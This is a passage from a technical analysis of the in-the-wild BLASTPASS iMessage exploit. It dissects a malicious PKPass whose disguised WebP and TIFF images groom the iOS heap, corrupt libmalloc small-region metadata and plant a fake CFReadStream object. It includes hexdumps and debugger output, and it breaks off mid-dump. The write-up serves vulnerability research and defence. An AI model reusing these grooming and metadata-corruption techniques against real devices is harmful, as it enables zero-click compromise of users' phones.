logo.png 175B manifest.json 18B  pass.json 3.3K signature The 5.5MB logo.png is the WebP image, just with a .png extension instead of .webp: $ file logo.png: logo.png:         RIFF (little-endian) data, Web/P image The closest thing to a specification for the PKPass format appears to be the Wallet Developer Guide, and whilst it doesn't explicitly state that the .png files should actually be Portable Network Graphics images, that's presumably the intention. This is yet another parallel with FORCEDENTRY, where a similar trick was used to reach the PDF parser when attempting to parse a GIF. PKPass files require a valid signature which is contained in manifest.json and signature. The signature has a presumably fake name and more timestamps indicating that the PKPass is very likely being generated and signed on the fly for each exploit attempt. pass.json is just this: {"pass": "PKpass"} Finally background.png: $ file background.png background.png: TIFF image data, big-endian, direntries=15, height=16, bps=0, compression=deflate, PhotometricIntepretation=RGB, orientation=upper-left, width=48 Curious. Another file with a misleading extension; this time a TIFF file with a .png extension. We'll return to this TIFF later in the analysis as it plays a critical role in the exploit flow, but for now we'll focus on the WebP, with one short diversion:Blastdoor So far I've only mentioned the WebP vulnerability, but the Apple advisory I linked at the start of this post mentions two separate CVEs: The first, CVE-2023-41064 in ImageIO, is the WebP bug (though just to keep things confusing with a different CVE from the upstream WebP fix which is CVE-2023-4863 - they're the same vulnerability though). The second, CVE-2023-41061 in "Wallet", is described in the Apple advisory as: "A maliciously crafted attachment may result in arbitrary code execution". The Isosceles blog post hypothesises: "Citizen Lab called this attack "BLASTPASS", since the attackers found a clever way to bypass the "BlastDoor" iMessage sandbox. We don't have the full technical details, but it looks like by bundling an image exploit in a PassKit attachment, the malicious image would be processed in a different, unsandboxed process. This corresponds to the first CVE that Apple released, CVE-2023-41061." This theory makes sense — FORCEDENTRY had a similar trick where the JBIG2 bug was actually exploited inside IMTranscoderAgent instead of the more restrictive sandbox of BlastDoor. But in all my experimentation, as well as all the in-the-wild crash logs I've seen, this hypothesis doesn't seem to hold. The PKPass file and the images enclosed within do get parsed inside the BlastDoor sandbox and that's where the crashes occur or the payload executes — later on we'll also see evidence that the NSExpression payload which eventually gets evaluated expects to be running inside BlastDoor. My guess is that CVE-2023-41061 is more likely referring to the lax parsing of PKPasses which didn't reject images which weren't png's. In late 2024, I received another set of in-the-wild crash logs including two which do in fact strongly indicate that there was also a path to hit the WebP vulnerability in the MobileSMS process, outside the BlastDoor sandbox! Interestingly, the timestamps indicate that these devices were targeted in November 2023, two months after the vulnerability was patched. In those cases the WebP code was reached inside the MobileSMS process via a ChatKit CKPassPreviewMediaObject created by a CKAttachmentMessagePartChatItem.What's in a WebP? I mentioned that the VP8L chunk in the WebP file is only around 1KB. Yet in the file listing above the WebP file is 5.5MB! So what's in the rest of it? Expanding out my WebP parser we see that there's one more RIFF chunk: EXIF : 0x586bb8 exif is Intel byte alignment EXIF has n_entries=1 tag=8769 fmt=4 n_components=1 data=1a subIFD has n_entries=1 tag=927c fmt=7 n_components=586b8c data=2c It's a (really really huge) EXIF - the standard format which cameras use to store image metadata — stuff like the camera model, exposure time, f-stop etc. It's a tag-based format and pretty much all 5.5MB is inside one tag with the id 0x927c. So what's that? Looking through an online list of EXIF tags just below the lens FocalLength tag and above the UserComment tag we spot 0x927c: It's the very-vague-yet-fascinating sounding: "MakerNote - Manufacturer specific information." Looking to Wikipedia for some clarification on what that actually is, we learn that "the "MakerNote" tag contains information normally in a proprietary binary format." Modifying the webp parser to now dump out the MakerNote tag we see: $ file sample.makernote sample.makernote: Apple binary property list Apple's chosen format for the "proprietary binary format" is binary plist! And indeed: looking through the ImageIO library in IDA there's a clear path between the WebP parser, the EXIF parser, the MakerNote parser and the binary plist parser.unbplisting I covered the binary plist format in a previous blog post. That was the second time I'd had to analyse a large bplist. The first time (for the FORCEDENTRY sandbox escape) it was possible mostly by hand, just using the human-readable output of plutil. Last year, for the Safari sandbox escape analysis, the bplist was 437KB and I had to write a custom bplist parser to figure out what was going on. Keeping the exponential curve going this year the bplist was 10x larger again. In this case it's fairly clear that the bplist must be a heap groom - and at 5.5MB, presumably a fairly complicated one. So what's it doing?Switching Views I had a hunch that the bplist would use duplicate dictionary keys as a fundamental building block for the heap groom, but running my parser it didn't output any... until I realised that my tool stored the parsed dictionaries directly as python dictionaries before dumping them. Fixing the tools to instead keep lists of keys and values it became clear that there were duplicate keys. Lots of them: In the Safari exploit writeup I described how I used different visualisation techniques to try to explore the structure of the objects, looking for patterns I could use to simplify what was going on. In this case, modifying the parser to emit well-formed curly brackets and indentation then relying on VS Code's automatic code-folding proved to work well enough for browsing around and getting a feel for the structure of the groom object. Sometimes the right visualisation technique is sufficient to figure out what the exploit is trying to do. In this case, where the primitive is a heap-based buffer overflow, the groom will inevitably try to put two things next to each other in memory and I want to know "what two things?" But no matter how long I stared and scrolled, I couldn't figure anything out. Time to try something different.Instrumentation I wrote a small helper to load the bplist using the same API as the MakerNote parser and ran it using the Mac Instruments app: Parsing the single 5.5MB bplist causes nearly half a million allocations, churning through nearly a gigabyte of memory. Just looking through this allocation summary it's clear there's lots of CFString and CFData objects, likely used for heap shaping. Looking further down the list there are other interesting numbers: The 20'000 in the last line is far too round a number to be a coincidence. This number matches up with the number of __NSDictionaryM objects allocated: Finally, at the very bottom of the list there are two more allocation patterns which stand out: There are two sets of very large allocations: eighty 1MB allocations and 44 4MB ones. I modified my bplist tool again to dump out each unique string or data buffer, along with a count of how many times it was seen and its hash. Looking through the file listing there's a clear pattern: Object Size Count 0x3FFFFF 44 0xFFFFF 80 0x3FFF 20 0x26A9 24978 0x2554 44 0x23FF 5822 0x22A9 4 0x1FFF 2 0x1EA9 26 0x1D54 40 0x17FF 66 0x13FF 66 0x3FF 322 0x3D7 404 0xF 112882 0x8 3 There are a large number of allocations which fall just below a "round" number in hexadecimal: 0x3ff, 0x13ff, 0x17ff, 0x1fff, 0x23ff, 0x3fff... That heavily hints that they are sized to fall exactly within certain allocator size buckets. Almost all of the allocations are just filled with zeros or 'A's. But the 1MB one is quite different: $ hexdump -C 170ae757_80.bin | head -n 20 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......| 00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....| 00000030  b0 c3 31 16 02 00 00 00  60 e3 01 00 00 00 00 00  |..1.....`.......| 00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............| 00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....| 00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| * 000004b0  00 00 00 00 00 00 00 00  10 c4 31 16 02 00 00 00  |..........1.....| 000004c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| * 000004e0  02 1c 00 00 01 00 00 00  00 00 00 00 00 00 00 00  |................| 000004f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000500  00 00 00 00 00 00 00 00  70 80 33 16 02 00 00 00  |........p.3.....| 00000510  b8 b5 e5 57 02 00 00 00  ff ff ff ff ff ff ff ff  |...W............| 00000520  58 c4 31 16 02 00 00 00  00 00 00 00 00 00 00 00  |X.1.............| 00000530  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| * 00000550  50 75 2c 18 02 00 00 00  01 00 00 00 00 00 00 00  |Pu,.............| Further on in the hexdump of the 1MB object there's clearly an NSExpression payload - this payload is also visible just running strings on the WebP file. Matthias Frielingsdorf from iVerify gave a talk at BlackHat Asia with an initial analysis of this NSExpression payload, we'll return to that at the end of this blog post. Equally striking (and visible in the hexdump above): there are clearly pointers in there. It's too early in the analysis to know whether this is a payload which gets rebased somehow, or whether there's a separate ASLR disclosure step. On a slightly higher level this hexdump looks a little bit like an Objective-C or C++ object, though some things are strange. Why are the first 24 bytes all zero? Why isn't there an isa pointer or vtable? It looks a bit like there are a number of integer fields before the pointers, but what are they? At this stage of the analysis, I had no idea.Thinking dynamically I had tried a lot to reproduce the exploit primitives on a real device; I built tooling to dynamically generate and sign legitimate PKPass files that I could send via iMessage to test devices and I could crash a lot, but I never seemed to get very far into the exploit - the iOS version range where the heap grooming works seems to be pretty small, and I didn't have an exact device and iOS version match to test on. Regardless of what I tried: sending the original exploits via iMessage, sending custom PKPasses with the trigger and groom, rendering the WebP directly in a test app or trying to use the PassKit APIs to render the PKPass file the best I could manage dynamically was to trigger a heap metadata integrity check failure, which I assumed was indicative of the exploit failing. (Amusingly, using the legitimate APIs to render the PKPass inside an app failed with an error that the PKPass file was malformed. And indeed, the exploit sample PKPass is malformed: it's missing multiple required files. But the "secure" PKPass BlastDoor parser entrypoint (PKPassSecurePreviewContextCreateMessagesPreview) is, in this regard at least, less strict and will attempt to render an incomplete and invalid PKPass). Though getting the whole PKPass parsed was proving tricky, with a bit of reversing it was possible to call the correct underlying CoreGraphics APIs to render the WebP and also get the EXIF/MakerNote parsed. By then setting a breakpoint when the huffman tables were allocated I had hoped it would be obvious what the overflow target was. But it was actually totally unclear what the following object was: (Here X3 points to the start of the huffman tables which are 0x3000 bytes large) (lldb) x/6xg $x3+0x3000 0x112000000: 0x0000000111800000 0x0000000000000000 0x112000010: 0x00000000001a1600 0x0000000000000004 0x112000020: 0x0000000000000001 0x0000000000000019 The first qword (0x111800000) is a valid pointer, but this is clearly not an Objective-C object, nor did it seem to look like any other recognizable object or have much to do with either the bplist or WebP. But running the tests a few times, there was a curious pattern: (lldb) x/6xg $x3+0x3000 0x148000000: 0x0000000147800000 0x0000000000000000 0x148000010: 0x000000000019c800 0x0000000000000004 0x148000020: 0x0000000000000001 0x0000000000000019 The huffman table is 0x2F28 bytes, which the allocator rounds up to 0x3000. And in both of those test runs, adding the allocation size to the huffman table pointer yielded a suspiciously round number. There's no way that's a coincidence. Running a few more tests the table+0x3000 pointer is always 8MB aligned. I remembered from some presentations on the iOS userspace allocator I'd read that 8MB is a meaningful number. Here's one from Synaktiv: Or this one from Angelboy: 8MB is the size of the iOS userspace default allocator's small rack regions. It looks like they might be trying to groom the allocator not to target application-specific data but allocator metadata. Time to dive into some libmalloc internals!libmalloc I'd suggest reading the two presentations linked above for a good overview of the iOS default userspace malloc implementation. Libmalloc manages memory on four levels of abstraction. From largest to smallest those are: rack, magazine, region and block. The size split between the tiny, small and large racks depends on the platform. Almost all the relevant allocations for this exploit come from the small rack, so that's the one I'll focus on. Reading through the libmalloc source I noticed that the region trailer, whilst still called a trailer, has been now moved to the start of the region object. The small region manages memory in chunks of 8MB. That 8MB gets split up in to (for our purposes) three relevant parts: a header, an array of metadata words, then blocks of 512 bytes which form the allocations: The first 0x28 bytes are a header where the first two fields form a linked-list of small regions: typedef struct region_trailer {         struct region_trailer *prev;         struct region_trailer *next;         unsigned bytes_used;         unsigned objects_in_use;         mag_index_t mag_index;         volatile int32_t pinned_to_depot;         bool recirc_suitable;         rack_dispose_flags_t dispose_flags; } region_trailer_t; The small region manages memory in units of 512 bytes called blocks. On iOS allocations from the small region consist of contiguous runs of up to 31 blocks. Each block has an associated 16-bit metadata word called a small meta word, which itself is subdivided into a "free" flag in the most-significant bit, and a 15-bit count. To mark a contiguous run of blocks as in-use (belonging to an allocation) the first meta word has its free flags cleared and the count set to the number of blocks in the run. On free, an allocation is first placed on a lookaside list for rapid reuse without freeing. But once an allocation really gets freed the allocator will attempt to greedily coalesce neighbouring chunks. While in-use runs can never exceed 31 blocks, free runs can grow to encompass the entire region.The groom Below you can see the state of the meta words array for the small region directly following the one containing the huffman table as its last allocation: (lldb) x/200wh 0x148000028 0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000058: 0x0000 0x0003 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000 0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c 0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000 With some simple maths we can convert indexes in the meta words array into their corresponding heap pointers. Doing that it's possible to dump the memory associated with the allocations shown above. The larger 0x19, 0x18 and 0x1c allocations all seem to be generic groom allocations, but the two 0x3 block allocations appear more interesting. The first one (with the first metadata word at 0x14800005a, shown in yellow) is the code_lengths array which gets freed directly after the huffman table building fails. The blue 0x3 block run (with the first metadata word at 0x148000090) is the backing buffer for a CFSet object from the MakerNote and contains object pointers. Recall that the corruption primitive will write the dword 0x270007 0x58 bytes off the end of the 0x3000 allocation (and that allocation happens to sit directly in front of this small region). That corruption has the following effect (shown in bold): (lldb) x/200wh 0x148000028 0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000058: 0x0007 0x0027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000 0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c 0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000 It's changed the size of an in-use allocation from 3 blocks to 39 (or from 1536 to 19968 bytes). I mentioned before that the maximum size of an in-use allocation is meant to be 31 blocks, but this doesn't seem to be checked in every single free path. If things don't quite work out, you'll hit a runtime check. But if things do work out you end up with a situation like this: (lldb) x/200wh 0x148000028 0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000 0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c 0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x8027 0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000 The yellow (0x8027) allocation now extends beyond its original three blocks and completely overlaps the following green (0x18) and blue (0x3) as well as the start of the purple (0x1c) allocation. But as soon as this corruption occurs WebP parsing fails and it's not going to make any other allocations. So what are they doing? How are they able to leverage these overlapping allocations? I was pretty stumped. One theory was that perhaps it was some internal ImageIO or BlastDoor specific object which reallocated the overlapping memory. Another theory was that perhaps the exploit had two parts; this first part which puts overlapping entries on the allocator freelist, then another file which is sent to exploit that? And maybe I was lacking that file? But then, why would there be that huge 1MB payload with NSExpressions in it? That didn't add up.Puzzling pieces As is so often the case, stepping back and not thinking about the problem for a while I realised that I'd completely overlooked and forgotten something critical. Right at the very start of the analysis I had run file on all the files inside the PKPass and noted that background.png was actually not a png but a TIFF. I had then completely forgotten that. But now the solution seemed obvious: the reason to use a PKPass versus just a WebP is that the PKPass parser will render multiple images in sequence, and there must be something in the TIFF which reallocates the overlapping allocation with something useful. Libtiff comes with a suite of tools for parsing tiff files. tiffdump displays the headers and EXIF tags: $ tiffdump background-15.tiff background-15.tiff: Magic: 0x4d4d Version: 0x2a Directory 0: offset 68 (0x44) next 0 (0) ImageWidth (256) SHORT (3) 1<48> ImageLength (257) SHORT (3) 1<16> BitsPerSample (258) SHORT (3) 4<8 8 8 8> Compression (259) SHORT (3) 1<8> Photometric (262) SHORT (3) 1<2> StripOffsets (273) LONG (4) 1<8> Orientation (274) SHORT (3) 1<1> SamplesPerPixel (277) SHORT (3) 1<4> StripByteCounts (279) LONG (4) 1<59> PlanarConfig (284) SHORT (3) 1<1> ExtraSamples (338) SHORT (3) 1<2> 700 (0x2bc) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> 33723 (0x83bb) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> 34377 (0x8649) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> ICC Profile (34675) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> The presence of the four 15KB buffers is notable, but they seemed to mostly just be zeros. Here's the output from tiffinfo: $ tiffinfo -c -j -d -s -z background-15.tiff === TIFF directory 0 === TIFF Directory at offset 0x44 (68)   Image Width: 48 Image Length: 16   Bits/Sample: 8   Compression Scheme: AdobeDeflate   Photometric Interpretation: RGB color   Extra Samples: 1   Orientation: row 0 top, col 0 lhs   Samples/Pixel: 4   Planar Configuration: single image plane   XMLPacket (XMP Metadata):   RichTIFFIPTC Data: , 15347 bytes   Photoshop Data: , 15347 bytes   ICC Profile: , 15347 bytes   1 Strips:       0: [       8,       59] Strip 0:  00 00 00 00 00 00 00 00 84 13 00 00 01 00 00 00 01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  cd ab 34 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... This dumps the uncompressed TIFF strip buffer and this looks much more interesting! There's clearly some structure, though not a lot of it. Is this really enough to do something useful? It looks like there could be some sort of object, but I didn't recognise the structure, and had no idea how replacing an object with this would be useful. I explored two possibilities:1) Alpha blending: This is actually the raw TIFF strip after decompression but before the rendering step which applies the alpha, so it was possible that this got rendered "on top" of another object. That seemed like a reasonable explanation for why the object seemed so sparse; perhaps the idea was to just "move" a pointer value. The first 16 bytes of the strip look like this: 00 00 00 00 00 00 00 00 84 13 00 00 01 00 00 00 which when viewed as two 64-bit values look like this: 0x0000000000000000 0x0000000100001384 It seemed sort-of plausible that rendering the 0x100001384 on top of another pointer might be a neat primitive, but there was something that didn't quite add up. This pointer-ish value is at the start of the strip buffer, so if the overlapping allocation got reallocated with this strip buffer directly, nothing interesting would happen, as the overlapping parts are further along. Maybe the overlapping buffer gets split up multiple times, but this was seeming less and less likely, and I couldn't reproduce this part of the exploit to actually observe what happened.2) This is an object: The other theory I had was that this actually was an object. The 8 zero bytes at the start were certainly strange… so then what's the significance of the next 8 bytes? 84 13 00 00 01 00 00 00 I tried using lldb's memory find command to see if there were other instances of that exact byte sequence occurring in a test iOS app rendering the WebP then the TIFF using the CoreGraphics APIs: (lldb) memory find -e 0x100001384 -- 0x100000000 0x200000000 data not found within the range. Nope, plus it was very, very slow. One thing I had noticed was that this byte sequence was similar to one near the start of the 1MB groom object: 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......| 00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....| 00000030  b0 c3 31 16 02 00 00 00  60 e3 01 00 00 00 00 00  |..1.....`.......| They're not identical, but it seemed a strange coincidence. I took a bunch of test app core dumps using lldb's process save-core command and wrote some simple code to search for similar-ish byte patterns. After some experimentation I managed to find something: 1c7b2600  49 d2 e4 29 02 00 00 01  84 13 00 00 02 00 00 00  |I..)............| 1c7b2610  42 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |B...............| 1c7b2620  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 1c7b2630  c0 92 d6 83 02 00 00 00  00 93 d6 83 02 00 00 00  |................| Converting those coredump offsets into VM address and looking them up revealed: (lldb) x/10xg 0x121E47600 0x121e47600: 0x0100000229e4d249 0x0000000200001384 0x121e47610: 0x0000000000000042 0x0000000000000000 0x121e47620: 0x0000000000000000 0x0000000000000000 (lldb) image lookup --address 0x229e4d248       Address: CoreFoundation[0x00000001dceed248] (CoreFoundation.__DATA_DIRTY.__objc_data + 7800)       Summary: (void *)0x0000000229e4d0e0: __NSCFArray It's an NSCFArray, which is the Foundation (Objective-C) "toll-free bridged" version of the Core Foundation (C) CFArray type! This was the hint that I was looking for to identify the significance of the TIFF and that 1MB groom object, which also contains a similar byte sequence. Cores and Foundations Even though Apple hasn't updated the open-source version of CoreFoundation for almost a decade, the old source is still helpful. Here's what a CoreFoundation object looks like: /* All CF "instances" start with this structure.  Never refer to  * these fields directly -- they are for CF's use and may be added  * to or removed or change format without warning.  Binary  * compatibility for uses of this struct is not guaranteed from  * release to release.  */ typedef struct __CFRuntimeBase {     uintptr_t _cfisa;     uint8_t _cfinfo[4]; #if __LP64__     uint32_t _rc; #endif } CFRuntimeBase; So the header is an Objective-C isa pointer followed by four bytes of _cfinfo, followed by a reference count. Taking a closer look at the uses of __cfinfo: CF_INLINE CFTypeID __CFGenericTypeID_inline(const void *cf) {   // yes, 10 bits masked off, though 12 bits are   // there for the type field; __CFRuntimeClassTableSize is 1024   uint32_t *cfinfop = (uint32_t *)&(((CFRuntimeBase *)cf)->_cfinfo);   CFTypeID typeID = (*cfinfop >> 8) & 0x03FF; // mask up to 0x0FFF   return typeID; } It seems that the second byte in __cfinfo is a type identifier. And indeed, running expr (int) CFArrayGetTypeID() in lldb prints: 19 (0x13) which matches up with both the object found in the coredump as well as the strange (or now not so strange) object in the TIFF strip buffer.X steps forwards, Y steps back Looking through more of the CoreFoundation code it seems that the object in the TIFF strip buffer is a CFArray with inline storage containing one element with the value 0x1234abcd. It also seems that it's possible for CF objects to have NULL isa pointers, which explains why the first 8 bytes of the fake object are zero. This is interesting, but it still doesn't actually get us any closer to figuring out what the next step of the exploit actually is. If the CFArray is meant to overlap with something, then what? And what interesting side-effects could having an CFArray with only a single element with the value 0x1234abcd possibly have? This seems like one step forward and two steps back, but there's something else which we can now figure out: what that 1MB groom object actually is. Let's take a look at the start of it again: 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......| 00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....| 00000030  b0 c3 31 16 02 00 00 00  48 e3 01 00 00 00 00 00  |..1.....H.......| 00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............| 00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....| 00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| It looks like another CF object, starting at +0x10 in the buffer with the same NULL isa pointer, a reference count of 1 and a __cfinfo of {0x80, 0x26, 0, 0}. The type identifiers aren't actually fixed, they're allocated dynamically via calls to _CFRuntimeRegisterClass like this: CFTypeID CFArrayGetTypeID(void) {     static dispatch_once_t initOnce;     dispatch_once(&initOnce, ^{ __kCFArrayTypeID = _CFRuntimeRegisterClass(&__CFArrayClass); });     return __kCFArrayTypeID; } The CFTypeIDs are really just indexes into the __CFRuntimeClassTable array, and even though the types are allocated dynamically the ordering seems sufficiently stable that the hardcoded type values in the exploit work. 0x26 is the CFTypeID for CFReadStream: struct _CFStream {     CFRuntimeBase _cfBase;     CFOptionFlags flags;     CFErrorRef error;     struct _CFStreamClient *client;     void *info;     const struct _CFStreamCallBacks *callBacks;     CFLock_t streamLock;     CFArrayRef previousRunloopsAndModes;     dispatch_queue_t queue; }; Looking through the CFStream code it seems to call various callback functions during object destruction — that seems like a very likely path towards code execution, though with some significant caveats: Caveat I: It's still unclear how an overlapping allocation in the small malloc region could lead to a CFRelease being called on this 1MB allocation. Caveat II: What about ASLR? There have been some tricks in the past targeting "universal gadgets" which work across multiple slides. Nemo also had a neat objective-c trick for defeating ASLR in the past, so it's plausible that there's something like that here. Caveat III: What about PAC? If it's a data-only attack then maybe PAC isn't an issue, but if they are trying to JOP they'd need a trick beyond just an ASLR leak, as all forward control flow edges should be protected by PAC.Special Delivery Around this time in my analysis Matthias Frielingsdorf offered me the use of an iPhone running 16.6, the same version as the targeted ITW victim. With Matthias' vulnerable iPhone, I was able to use the Dopamine jailbreak to attach lldb to MessagesBlastDoorService and after a few tries was able to reproduce the exploit right up to the CFRelease call on the fake CFReadStream, confirming that that part of my analysis was correct! Collecting a few crashes led, yet again, to even more questions...Caveat I: Mysterious Pointers Similar to the analysis of the huffman tables, there was a clear pattern in the fake object pointers, which this time were even stranger than the huffman tables. The crash site was here: LDR    X8, [X19,#0x30] LDR    X8, [X8,#0x58] At this point X19 points to the fake CFReadStream object, and collecting a few X19 values there's a pretty clear pattern: 0x000000075f000010 0x0000000d4f000010 The fake object is inside a 1MB heap allocation, but all those fake object addresses are always 16 bytes above a 16MB-aligned address. It seemed really strange to me to end up with a pointer 0x10 bytes past such a round number. What kind of construct would lead to the creation of such a pointer? Even though I did have a debugger attached to MessagesBlastDoorService, it wasn't a time-travel debugger, so figuring out the history of such a pointer was non-trivial. Using the same core dump analysis techniques I could see that the pointer which would end up in X19 was also present in the backing buffer of the CFSet described earlier. But how did it get there? Having found the strange CFArray inside the TIFF I was heavily biased towards believing that this must have something to do with it, so I wrote some tooling to modify the fake CFArray's in the TIFF in the exploit. The theory was that by messing with that CFArray, I could cause a crash when it was used and figure out what was going on. But making minor changes to the strip buffer didn't seem to have any effect — the exploit still worked! Even replacing the entire strip buffer with A's didn't stop the exploit working... What's going on?Stepping back I had made a list of the primitives I thought might lead to the creation of such a strange looking pointer — first on the list was a partial pointer overwrite. But then why the CFArray? But now having shown that the CFArray can't be involved, it was time to go back to the list. And step back even further and make sure I'd really looked at all of that TIFF... There were still those four other metadata buffers in the tiffdump output I'd shown earlier: 700 (0x2bc) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> 33723 (0x83bb) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> 34377 (0x8649) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> ICC Profile (34675) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> I'd just dismissed them, but, maybe I shouldn't have done that? I had actually already dumped the full contents of each of those buffers and checked that there wasn't something else apart from the zeros. They were all zeros, except the third-to-last bytes which were 0x10, which I'd considered completely uninteresting. Uninteresting, unless you wanted to partially overwrite the three least-significant bytes of a little-endian pointer value with 0x000010 that is! Let's look back at the SMALL metadata: 0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000 0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c 0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x8027 Each of those four metadata buffers in the TIFF is 15347 bytes, which is 0x3bf3 — looked at another way that's 0x3c00 (the size rounded up to the next 0x200 block size), minus 5, minus 8. 0x3c00 is exactly 30 0x200 byte blocks. Each 16-bit word in the metadata array shown above corresponds to one 0x200 block, where the overlapping chunk in yellow starts at 0x14800005a. Counting forwards 30 chunks means that the end of a 0x3c00 allocation overlaps perfectly with the end of the original blue three-chunk allocation: 0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000 0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c 0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 